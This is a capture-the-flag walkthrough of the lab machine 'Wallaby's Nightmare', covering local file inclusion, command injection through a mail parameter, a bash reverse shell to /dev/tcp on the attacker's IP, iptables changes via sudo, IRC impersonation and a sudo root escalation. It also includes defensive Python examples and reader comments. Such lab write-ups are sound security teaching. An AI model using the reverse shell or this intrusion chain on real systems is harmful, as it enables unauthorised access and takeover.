Wallaby's: Nightmare
Location
https://download.vulnhub.com/wallabys/wallabysnightmare.rar
Introduction
Level: beginner-intermediate
This is the first boot2root machine created by Waldo.
It’s the first part in a two-part series. The creator was inspired by many VMs from vulnhub.com and made this with different attack vectors. The machine will respond to how the ‘intruder’ tries to get in. Make a wrong move and some stuff gets moved around, making the machine more difficult!
It was created for educational purposes and so people can have a little fun testing their skills in a legal, pentest lab environment.
Scenario: The intruder is breaking into a fictional character's server (named Wallaby) and tries to gain root without him noticing, or else the difficulty level will increase if you make the wrong move!
Getting Started
First I run an nmap scan to discover any open ports.
┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.4

Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-30 13:37 CET
Nmap scan report for 192.168.171.4
Host is up (0.00054s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA)
|_  256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA)
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Wallaby's Server
6667/tcp filtered irc
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds
My first stop is the SSH server for some banner grabbing.
┌─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.171.4 -p 22
The authenticity of host '192.168.171.4 (192.168.171.4)' can't be established.
ECDSA key fingerprint is SHA256:nRDXRBPtapHeG1jqIbacovukdKPIveFVy1GE8kntdU4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.171.4' (ECDSA) to the list of known hosts.
n13mant@192.168.171.4's password:
No useful banner here. Onward to the webserver.
Things are getting serious!
The URL makes use of a parameter. When I change the parameter I get access to ‘/etc/passwd’.
Looks like there are two users: “walfin” and “steven?”.
Looks like this vector is gone. After another nmap scan it seems that port 80 is closed and another port has opened, which now runs the webserver.
┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.4

Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-30 14:04 CET
Nmap scan report for 192.168.171.4
Host is up (0.00094s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA)
|_  256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA)
6667/tcp  filtered irc
60080/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Wallaby's Server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds
Let’s see if the previous vulnerability is still active.
Looks like the LFI vulnerability still exists. Or so I thought.
Guess I’m being trolled here. Time for finding a new vector.
Because dirb wasn’t getting me anywhere, I tried Wfuzz.
┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $wfuzz -c -z file,/usr/share/wordlists/openwordlist/language/english/lower.lst --hc 404 --hw 87 http://192.168.171.4:60080/?page=FUZZ

********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                    *
********************************************************

Target: http://192.168.171.4:60080/?page=FUZZ
Total requests: 390532

==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================

37084:   C=200     27 L      106 W        994 Ch      "blacklist"
69281:   C=200     26 L       86 W        895 Ch      "contact"
147277:  C=200     30 L      115 W       1147 Ch      "home"
158165:  C=200     38 L      150 W       1362 Ch      "index"
186261:  C=200     29 L      102 W       1085 Ch      "mailer"
-----SNIP-----
After checking some pages I got to the last one on my list which was the most promising one.
<!--a href='/?page=mailer&mail=mail wallaby "message goes here"'><button type='button'>Sendmail</button-->
<!--Better finish implementing this so N13manT can send me all his loser complaints!-->
The parameter, commented out in the source code, was vulnerable to arbitrary code execution.
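Both request parameters on this box fail the same way: user input is used as a file path (the ‘page’ LFI) or as part of a shell command (the ‘mail’ parameter). The following is an added example of how the two parameters could be handled safely; it is not the machine's code, and the page names, local users and template paths are assumptions for the illustration.

```python
import re
import subprocess

# Constructed allowlist using the page names wfuzz found on this box.
# ?page=NAME selects a dict key; user input never becomes a filesystem path.
PAGES = {
    "home": "templates/home.html",
    "contact": "templates/contact.html",
    "mailer": "templates/mailer.html",
    "blacklist": "templates/blacklist.html",
    "index": "templates/index.html",
}

# Local accounts that may receive mail from the web form (constructed).
LOCAL_USERS = {"wallaby", "waldo"}
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def resolve_page(name):
    """Return the template for ?page=NAME, or None if it is not allowlisted.

    '../../etc/passwd' or '/etc/passwd' is simply an unknown key here,
    which is what closes the LFI the walkthrough used."""
    return PAGES.get(name)


def build_mail_argv(recipient, message):
    """Return the argv list for mail(1), or None if the input is rejected.

    The box built the string 'mail wallaby "..."' from the request and
    handed it to a shell. Here the command is fixed, the recipient is
    validated against an allowlist, and the body goes on stdin, so quotes,
    ';' or '$(...)' in the message are just text."""
    if not USERNAME_RE.match(recipient) or recipient not in LOCAL_USERS:
        return None
    if any(ord(c) < 32 and c not in "\n\t" for c in message):
        return None  # no control characters or NUL in the body
    return ["/usr/bin/mail", "-s", "Website message", recipient]


def send_message(recipient, message):
    """Run mail(1) without a shell; raises ValueError on rejected input."""
    argv = build_mail_argv(recipient, message)
    if argv is None:
        raise ValueError("rejected recipient or message")
    subprocess.run(argv, input=message.encode(), check=True)
```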
Because it will be much easier to recon the system with a shell, I use a bash command to create a reverse shell.
bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"
Which I need to URL encode.
┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 37744
bash: cannot set terminal process group (1074): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html$
www-data@ubuntu:/var/www/html$ ls -lah /home
ls -lah /home
total 20K
drwxr-xr-x  5 root    root    4.0K Dec 16 15:44 .
drwxr-xr-x 22 root    root    4.0K Dec 14 19:24 ..
drwxr-xr-x  5 ircd    ircd    4.0K Dec 16 15:28 ircd
drwxr-xr-x  5 waldo   waldo   4.0K Dec 16 16:51 waldo
drwxr-xr-x  8 wallaby wallaby 4.0K Dec 16 16:02 wallaby
Looks like there are 2 users and an IRC bot.
www-data@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables
It seems I have some sudo rights. For instance, I can change the firewall rules.
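The two sudo listings on this machine (www-data above, and wallaby later with NOPASSWD: ALL) are exactly the kind of entries a sudoers audit should flag. As an added example, not part of the original writeup, here is a small parser for ‘sudo -l’ output with a classification of each entry; the sample text is constructed from the listings on this page and the set of service accounts and sensitive binaries is an assumption.

```python
import re

# Constructed sample: the two 'sudo -l' listings seen on this box.
SUDO_L_OUTPUT = """\
User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables
User wallaby may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL
"""

USER_RE = re.compile(r"^User (\S+) may run")
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?:(?P<tags>(?:\w+:\s*)+))?(?P<cmd>.+)$")

# Accounts that run network-facing services should have no sudo entries at all.
SERVICE_ACCOUNTS = {"www-data", "nobody", "apache", "nginx"}
# Binaries whose sudo use hands over control of something security relevant
# (the firewall and an editor of a root-owned config, as on this box).
SENSITIVE = {"/sbin/iptables", "/usr/sbin/iptables", "/usr/bin/vim", "/usr/bin/vi"}


def parse_sudo_l(text):
    """Yield (user, runas, nopasswd, command) for each entry in 'sudo -l' output."""
    user = None
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m and user:
            tags = m.group("tags") or ""
            yield user, m.group("runas"), "NOPASSWD" in tags, m.group("cmd").strip()


def classify(user, runas, nopasswd, cmd):
    """Return (severity, reason) for one entry, or None if it is unremarkable."""
    binary = cmd.split()[0]
    if cmd == "ALL":
        return "high", f"unrestricted sudo as ({runas})"
    if user in SERVICE_ACCOUNTS:
        return "high", f"service account may run {cmd} as ({runas})"
    if binary in SENSITIVE:
        return "medium", f"sensitive binary {binary} as ({runas})"
    if nopasswd:
        return "low", f"NOPASSWD on {cmd}"
    return None


def audit(text):
    """Return a list of (severity, user, reason) findings for 'sudo -l' output."""
    findings = []
    for user, runas, nopasswd, cmd in parse_sudo_l(text):
        result = classify(user, runas, nopasswd, cmd)
        if result:
            findings.append((result[0], user, result[1]))
    return findings
```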
www-data@ubuntu:/$ sudo iptables -S
sudo iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6667 -j DROP
There is a rule that drops packets on port 6667. When I check my notes I see that there is a filtered port 6667 in my nmap scan: 6667/tcp filtered irc.
www-data@ubuntu:/$ netstat -anp | grep "LISTEN"
netstat -anp | grep "LISTEN"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::60080                :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
After checking the networking it seems there is an IRC server running locally.
www-data@ubuntu:/$ dpkg -l
dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name           Version      Architecture Description
+++-==============-============-============-=================================
-----SNIP-----
ii  irssi          0.8.19-1ubun amd64        terminal based IRC client
-----SNIP-----
www-data@ubuntu:/home/waldo$ ./irssi.sh
./irssi.sh
no server running on /tmp/tmux-33/default
At first I tried to use an IRC client on the remote machine, but that didn’t work. So, because I can alter the firewall rules, I can try to flush the iptables rules and connect to the IRC port from my own machine.
After a few tries I get a channel with a user Waldo and a bot.
The bot has its own command to show the list of custom commands, because /help is handled by HexChat itself. That command is .help.
Oh oh……busted! So it knows I’m not Waldo. I need to get Waldo out of the chatroom and replace myself with the waldo username. But how? I’ve tried the kick/ban options on this side. Didn’t work. So I need to deny its access from the other side……back to the firewall rules.
www-data@ubuntu:/home/wallaby$ id waldo
id waldo
uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
To set the correct rule I check out a site which provides me with the answer I was seeking.
www-data@ubuntu:/home/wallaby$ sudo iptables -I OUTPUT -m owner --uid-owner 1000 -p tcp --dport 6667 -j DROP
<T -m owner --uid-owner 1000 -p tcp --dport 6667 -j DROP
www-data@ubuntu:/home/wallaby$ sudo iptables -L
sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  anywhere             anywhere             owner UID match waldo tcp dpt:ircd
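From the defender's side, the interesting thing in the listing above is how far the ruleset has drifted from what ‘iptables -S’ showed earlier: the two INPUT rules for port 6667 are gone and an owner-match DROP has appeared in OUTPUT. The following is an added example, not code from the machine, of a baseline comparison that would surface both changes; the baseline is the earlier ‘-S’ output from this page and the "current" text is a constructed ‘-S’ equivalent of the ‘-L’ listing above.

```python
# Constructed baseline: the ruleset 'iptables -S' showed on this box before
# the intruder changed anything.
BASELINE = """\
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6667 -j DROP
"""

# Constructed 'iptables -S' output equivalent to the '-L' listing after the
# INPUT chain was flushed and the owner-match rule was inserted in OUTPUT.
CURRENT = """\
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A OUTPUT -p tcp -m owner --uid-owner 1000 -m tcp --dport 6667 -j DROP
"""


def parse_rules(text):
    """Split 'iptables -S' output into ({chain: policy}, [rule lines]).

    Rule order matters in iptables, so the list keeps the original order."""
    policies, rules = {}, []
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if parts[0] == "-P":
            policies[parts[1]] = parts[2]
        elif parts[0] == "-A":
            rules.append(line.strip())
    return policies, rules


def diff_rulesets(baseline_text, current_text):
    """Report drift as {'policy_changes', 'removed', 'added'}."""
    b_pol, b_rules = parse_rules(baseline_text)
    c_pol, c_rules = parse_rules(current_text)
    policy_changes = {ch: (b_pol.get(ch), c_pol.get(ch))
                      for ch in set(b_pol) | set(c_pol)
                      if b_pol.get(ch) != c_pol.get(ch)}
    return {
        "policy_changes": policy_changes,
        "removed": [r for r in b_rules if r not in c_rules],
        "added": [r for r in c_rules if r not in b_rules],
    }


def is_drifted(report):
    """True when any policy or rule differs from the baseline."""
    return bool(report["policy_changes"] or report["removed"] or report["added"])
```

In practice the baseline is saved once from a known-good state and the comparison is run periodically against fresh ‘iptables -S’ output, alerting on any drift.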
After a while waldo is gone……..the king is dead, long live the king!
With the /nick command I change my nickname to ‘waldo’ and assume his place.
Time for another reverse shell. I use the same as before, but this time change the port number to 1337.
┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 1337
listening on [any] 1337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 60128
bash: cannot set terminal process group (699): Inappropriate ioctl for device
bash: no job control in this shell
wallaby@ubuntu:~$ id
id
uid=1001(wallaby) gid=1001(wallaby) groups=1001(wallaby),4(adm)
wallaby@ubuntu:~$
After this it was easy to obtain root.
wallaby@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for wallaby on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wallaby may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL
wallaby@ubuntu:~$ sudo su -
sudo su -
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# cd /root
cd /root
root@ubuntu:~# ls -lah
ls -lah
total 48K
drwx------  4 root root 4.0K Dec 27 19:31 .
drwxr-xr-x 22 root root 4.0K Dec 14 19:24 ..
drwxr-xr-x  2 root root 4.0K Dec 27 11:27 backups
-rw-------  1 root root    1 Dec 27 12:26 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rwxr-xr-x  1 root root  510 Dec 27 19:31 check_level.sh
-rw-r--r--  1 root root  342 Dec 16 16:52 flag.txt
-rw-------  1 root root   18 Dec 15 13:03 .mysql_history
drwxr-xr-x  2 root root 4.0K Dec 15 13:10 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Dec 15 17:50 .selected_editor
-rw-r--r--  1 root root  214 Dec 16 17:09 .wget-hsts
root@ubuntu:~# cat flag.txt
cat flag.txt
###CONGRATULATIONS###
You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!!
This was my first vulnerable machine/CTF ever! I hope you guys enjoyed playing it as much as I enjoyed making it!
Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it.
Thanks guys!
-Waldo
Conclusion
This challenge was fun to do. The difficulty level didn’t change that much, and after the first moment of being “caught” there wasn’t really a game changer. The machine did feel a bit “buggy” when I was trying to execute an arbitrary command and the system didn’t respond. After a reset of the machine and following the exact same steps I was able to get a better and smoother experience.
Thanks Waldo for making this VM. Hope to see more of your work in the near future.
I have a doubt about the IP you start to Nmap!
How did you get this IP address 192.168.171.4?
Sorry, I’m totally new to this field, please help.
Hi Yash,
192.168.171.4 was assigned by the DHCP server.
This is not an external IP address. So if you try to scan the same IP, you won’t get any good result.
When you run the image in your VMware or VBox it will get its own IP address. You can set the IP range yourself in the settings of your VM software.
Good luck.